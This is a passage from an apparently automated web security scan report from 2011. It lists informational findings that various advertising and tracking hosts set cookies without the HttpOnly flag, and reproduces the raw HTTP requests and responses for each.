6.158. http://r1-ads.ace.advertising.com/ctst=1/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /ctst=1/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ctst=1/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302542476264&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=VFFoNJpwIg02FAHCdbdBwhAZhXAcIgZ4FAHC8opBwhQKaaAcIAY4FAHCHopBwhwrhXAcIca4FAHCdDmBwhAmoZAcII0rGAHC00pBwhgJjaAcIUEoGAH; GUID=MTMwMjM1MjIxMzsxOjE2cGZidXQxZDQ1aXVuOjM2NQ; ACID=gp060013025424780038; ASCID=gp060013025424780038

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.845773.751177.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 11 Apr 2011 17:21:19 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 344
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 17:21:18 GMT
Connection: close
Set-Cookie: C2=OizoNJpwHg02FG9BdbdhRfAZhXY0HgZ4FG9B8ophRfQKaaY0HAY4FG9BHophRfwrhXY0Hca4FG9BdDmhRfAmoZY0HI0rGG9B00phRfgJjaY0HUEoGGN; domain=advertising.com; expires=Wed, 10-Apr-2013 17:21:19 GMT; path=/
Set-Cookie: F1=B4IOj2kAAAAAJZ3CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 10-Apr-2013 17:21:19 GMT; path=/
Set-Cookie: 78539819=_4da3388e,4231558641,751177^845773^1183^0,0_; domain=advertising.com; path=/click

document.writeln('<script src="http:\/\/tag.admeld.com\/passback\/js\/3\/foxnews\/728x90\/1\/meld.js"><\/script>\r\n\r\n\r\n');
var can_adInfoTag = {};
can_adInfoTag["4231558641"] = {
"CAN_ver"
...[SNIP]...
6.159. http://r1-ads.ace.advertising.com/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302542476264&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=VFFoNJpwIg02FAHCdbdBwhAZhXAcIgZ4FAHC8opBwhQKaaAcIAY4FAHCHopBwhwrhXAcIca4FAHCdDmBwhAmoZAcII0rGAHC00pBwhgJjaAcIUEoGAH; GUID=MTMwMjM1MjIxMzsxOjE2cGZidXQxZDQ1aXVuOjM2NQ

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://r1-ads.ace.advertising.com/ctst=1/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 11 Apr 2011 17:21:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 279
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 17:21:18 GMT
Connection: close
Set-Cookie: ACID=qz970013025424780040; domain=advertising.com; expires=Wed, 10-Apr-2013 17:21:18 GMT; path=/
Set-Cookie: ASCID=qz970013025424780040; domain=advertising.com; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://r1-ads.ace.advertising.com/ctst=1/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x12
...[SNIP]...
6.160. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=38627&partnerID=216&clientID=4608&key=segment&returnType=js HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2507573;type=ads-a681;cat=ads-a941;ord=1;num=8143914125394.076?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=db77f2e7-27f9-4223-8780-7287dc87810a; exchange_uid="eyI0IjpbIkNBRVNFS09ONkpueXZ2TWVsby1xbklGLTVmVSIsNzM0MjI5XX0="; partnerUID="eyI3OSI6IFsiNmNmN2Q2MjlkMzc5MWVlNjRhY2IyNzFkMGJiMTJkMzEiLCB0cnVlXX0="; segments_p1="eJzjYuF4PIGRi5njJAeQaIoAEv9ArP8+XCwc6z+AZDZyAACXJAhf"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 09 Apr 2011 00:16:53 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sat, 09-Apr-2011 00:16:33 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments_p1="eJzjYuZoiuBi4Xg8gZGLmeMkB5C5/gOIuRHEfLyWCcj8xwEk/vsAAMt1Cgc="; Domain=invitemedia.com; expires=Sun, 08-Apr-2012 00:16:53 GMT; Path=/
Content-Length: 0

6.161. http://segment-pixel.invitemedia.com/unpixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /unpixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /unpixel?pixelID=30767&partnerID=81&clientID=1499&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=db77f2e7-27f9-4223-8780-7287dc87810a; partnerUID="eyI3OSI6IFsiNmNmN2Q2MjlkMzc5MWVlNjRhY2IyNzFkMGJiMTJkMzEiLCB0cnVlXX0="; exchange_uid=eyIyIjogWyI4NjYzNDk2NzYyMjk0MzM3MjY1IiwgNzM0MjM2XSwgIjQiOiBbIkNBRVNFS09ONkpueXZ2TWVsby1xbklGLTVmVSIsIDczNDIyOV19; uid=dcb84907-869e-4e7d-baf7-9761469e8965; segments_p1=eJzjYuF4vJaJi5mjMYILyJzACCSf9zMCBU5yAImmCCDxD8T67wOUWf8BJLORAwBSdgyC

Response

HTTP/1.1 302 Found
Date: Sat, 09 Apr 2011 13:54:17 GMT
Set-Cookie: segments_p1=eJzjYuF4vJaJi5mjMYKLheN5PyOQfDyBEShwkgNINEUAiX8g1n8fILGRAwAJqArM;Path=/;Domain=invitemedia.com;Expires=Sun, 08-Apr-2012 13:54:17 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/unpixel?id=1062338&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)

6.162. http://segments.adap.tv/data  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segments.adap.tv
Path:   /data

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /data?p=quantcast-adaptv&type=gif&segment=D,T&add=true HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_page_url=M3h9qeyoFhilJJ6HSKW-Ih8ErlmQyxh/jTTH/xtpQjCqPVjzIafrKmPMbhDYLFSNHlonA/EwBN8wEKrozBrD-Joz0kZO3Wd8; adaptv_unique_user_cookie="-3998873301156420199__TIME__2011-04-09+05%3A31%3A02"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-3998873301156420199__TIME__2011-04-09+05%3A31%3A05";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-2042 14:17:45 GMT
p3p: CP="DEM"
Cache-Control: no-cache
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"24\":{\"f\":1304924400,\"e\":1304924400,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-2042 14:17:45 GMT
Content-Type: image/gif
Server: Jetty(6.1.26)
Content-Length: 42

GIF89a.............!.......,...........D.;
6.163. http://segments.adap.tv/data/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segments.adap.tv
Path:   /data/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /data/?p=newsinc-quantcast&type=gif&segment=D,T HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_page_url=M3h9qeyoFhilJJ6HSKW-Ih8ErlmQyxh/jTTH/xtpQjCqPVjzIafrKmPMbhDYLFSNHlonA/EwBN8wEKrozBrD-Joz0kZO3Wd8; adaptv_unique_user_cookie="-3998873301156420199__TIME__2011-04-09+05%3A31%3A02"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-3998873301156420199__TIME__2011-04-09+05%3A31%3A05";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-2042 14:17:45 GMT
p3p: CP="DEM"
Cache-Control: no-cache
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"13\":{\"f\":1304924400,\"e\":1304924400,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-2042 14:17:45 GMT
Content-Type: image/gif
Server: Jetty(6.1.26)
Content-Length: 42

GIF89a.............!.......,...........D.;
6.164. http://server.iad.liveperson.net/hc/47227738/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/47227738/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/47227738/?&site=47227738&cmd=mTagStartPage&lpCallId=702605261700-405870079528&protV=20&lpjson=1&page=http%3A//www.clickability.com/&id=7001425185&javaSupport=true&visitorStatus=INSITE_STATUS&activePlugin=none&cobrowse=true&PV%21visitorActive=1&title=Clickability%20%7C%20www.clickability.com%20%7C%20SaaS%20Web%20Content%20Management%20System%20%28WCM%29%20for%20Enterprises&cookie=cc%3Dt%3B%20_vt_%3DNGJjOTVmNjMxNWNmOWMzMzQyMGVhYjVjMTZmZDlkZTM%253D%3B%20__utmz%3D226774607.1302308285.1.1.utmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29%3B%20__utma%3D226774607.1949955237.1302308285.1302308285.1302308285.1%3B%20__utmc%3D226774607%3B%20__utmb%3D226774607.1.10.1302308285%3B%20vmVisitorState%3D0%3B%20vmSessionId%3D2FE6582E07B2ABC36A24B66685F3E6E3%3B%20click_mobile%3D0%3B%20__ar_v4%3D%257C24H2I4YFKNA3JHF7DBOLEQ%253A20110409%253A1%257CJ2XVQLHIHRDGBKODSAL526%253A20110409%253A1%257CNT4ZDKY4VNBDLG4GSD4LKH%253A20110409%253A1 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=2919698114099460296; LivePersonID=LP i=48701824114,d=1301944418; HumanClickACTIVE=1302308296399

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:18:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_47227738=STANDALONE; path=/hc/47227738
Set-Cookie: LivePersonID=-48701824114-1302308297:-1:-1:-1:-1; expires=Sun, 08-Apr-2012 00:18:32 GMT; path=/hc/47227738; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 09 Apr 2011 00:18:32 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 6321

lpConnLib.Process({"ResultSet": {"lpCallId":"702605261700-405870079528","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!tagToBrowser_compact.js", "js_code": "function lpTagToBrowser(src,type,ch
...[SNIP]...
6.165. http://server.iad.liveperson.net/hc/47227738/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/47227738/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/47227738/?&site=47227738&cmd=mTagKnockPage&lpCallId=377281360793-821173440431&protV=20&lpjson=1&id=7001425185&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=48701824114,d=1301944418

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:18:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=3452818251295477090; path=/hc/47227738
Set-Cookie: HumanClickACTIVE=1302308300837; expires=Sun, 10-Apr-2011 00:18:20 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 09 Apr 2011 00:18:20 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1405

lpConnLib.Process({"ResultSet": {"lpCallId":"377281360793-821173440431","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'server.iad.liveper
...[SNIP]...
6.166. http://sync.adap.tv/sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.adap.tv
Path:   /sync

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sync?type=gif&key=tidaltv&uid=bf84cb16-bb4c-4b62-acfc-f9edb82529ad HTTP/1.1
Host: sync.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_page_url=M3h9qeyoFhilJJ6HSKW-Ih8ErlmQyxh/jTTH/xtpQjCqPVjzIafrKmPMbhDYLFSNHlonA/EwBN8wEKrozBrD-Joz0kZO3Wd8; adaptv_unique_user_cookie="-3998873301156420199__TIME__2011-04-09+05%3A31%3A02"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-3998873301156420199__TIME__2011-04-09+05%3A31%3A05";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-2042 14:17:45 GMT
p3p: CP="DEM"
Cache-Control: no-cache
Set-Cookie: rtbData0="key=tidaltv:value=bf84cb16-bb4c-4b62-acfc-f9edb82529ad:expiresAt=Wed+Jun+08+05%3A31%3A05+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-2042 14:17:45 GMT
Content-Type: image/gif
Server: Jetty(6.1.26)
Content-Length: 42

GIF89a.............!.......,...........D.;
6.167. http://sync.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img?mt_exid=1&type=sync&redir=http%3A%2F%2Fads.adbrite.com%2Fadserver%2Fvdi%2F684339%3Fd%3D%5BVISITORDATA%5D HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mt_mop=10004:1301797090; uuid=4d97b063-cd55-fcc9-f79b-3dc3c331fd5b; ts=1301951211

Response

HTTP/1.1 302 Found
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-x3 pid 0x3ede 16094
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sat, 09 Apr 2011 12:35:47 GMT
Location: http://ads.adbrite.com/adserver/vdi/684339?d=uuid%3D4d97b063-cd55-fcc9-f79b-3dc3c331fd5b
Etag: 4d97b063-cd55-fcc9-f79b-3dc3c331fd5b
Connection: Keep-Alive
Set-Cookie: ts=1302352547; domain=.mathtag.com; path=/; expires=Sun, 08-Apr-2012 12:35:47 GMT
Content-Length: 0

6.168. http://sync.tidaltv.com/adaptv.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.tidaltv.com
Path:   /adaptv.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adaptv.ashx HTTP/1.1
Host: sync.tidaltv.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 09 Apr 2011 12:31:05 GMT
Location: http://sync.adap.tv/sync?type=gif&key=tidaltv&uid=f0a5911f-4232-4b31-8480-675d914667c4
Server: Microsoft-IIS/6.0
Set-Cookie: tidal_ttid=f0a5911f-4232-4b31-8480-675d914667c4; domain=tidaltv.com; expires=Sun, 09-Apr-2028 12:31:05 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 211
Connection: keep-alive

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://sync.adap.tv/sync?type=gif&amp;key=tidaltv&amp;uid=f0a5911f-4232-4b31-8480-675d914667c4">here</a>.</h2>
</bod
...[SNIP]...
6.169. http://tacoda.at.atwola.com/rtx/r.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.js?cmd=LCN&si=13750&pi=-&xs=3&pu=http%253A//www.wptz.com/index.html%253Fifu%253D&df=1&v=5.5&cb=48124 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZwZmJ1dDFkNDVpdW4=; ANRTT=53615^1^1302399365|57125^1^1302391406|60197^1^1302391477|52576^1^1302399365|52766^1^1302399365; TData=99999|^|60740|60489|60515|60514|52615|53656|57130|52766|56988|60197|56969|52576|56835|57129|56732|56830|56768|53575|#|53615|57125; N=2:705df1d2c9325c0834b34815bcd5513e,705df1d2c9325c0834b34815bcd5513e; ATTAC=a3ZzZWc9OTk5OTk6NjA3NDA6NjA0ODk6NjA1MTU6NjA1MTQ6NTI2MTU6NTM2NTY6NTcxMzA6NTI3NjY6NTY5ODg6NjAxOTc6NTY5Njk6NTI1NzY6NTY4MzU6NTcxMjk6NTY3MzI6NTY4MzA6NTY3Njg6NTM1NzU6NTM2MTU6NTcxMjU=; JEB2=4D97D4AE6E651A440C6EAF39F0006986

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:29:56 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sat, 09 Apr 2011 12:44:56 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZwZmJ1dDFkNDVpdW4=; path=/; expires=Tue, 03-Apr-12 12:29:56 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=53615^1^1302399365|57125^1^1302391406|60197^1^1302391477|52576^1^1302399365|52766^1^1302399365|50213^1^1302956996; path=/; expires=Sat, 16-Apr-11 12:29:56 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1302352196^1302353996|13750^1302352196^1302353996; path=/; expires=Sat, 09-Apr-11 12:59:56 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|60740|60489|56282|56263|60515|56229|60514|52615|53656|57130|52766|50213|60197|56969|56988|56835|57129|56732|56830|52576|53575|56768|#|53615|57125; expires=Tue, 03-Apr-12 12:29:56 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:705df1d2c9325c0834b34815bcd5513e,e295433643eb8b3496aef1faaa47ba8c; expires=Tue, 03-Apr-12 12:29:56 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NjA3NDA6NjA0ODk6NTYyODI6NTYyNjM6NjA1MTU6NTYyMjk6NjA1MTQ6NTI2MTU6NTM2NTY6NTcxMzA6NTI3NjY6NTAyMTM6NjAxOTc6NTY5Njk6NTY5ODg6NTY4MzU6NTcxMjk6NTY3MzI6NTY4MzA6NTI1NzY6NTM1NzU6NTY3Njg6NTM2MTU6NTcxMjU=; expires=Tue, 03-Apr-12 12:29:56 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=1; path=/; expires=Sun, 08-Apr-12 12:29:56 GMT; domain=tacoda.at.atwola.com
Cteonnt-Length: 248
Content-Type: application/x-javascript
Content-Length: 248

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16pfbut1d45iun';
var ANSL='99999|^|60740|60489|56282|56263|60515|56229|60514|52615|53656|57130|52766|50213|60197|56969|56988|56835|57129|56732|56830|
...[SNIP]...
6.170. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/politics-bottom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
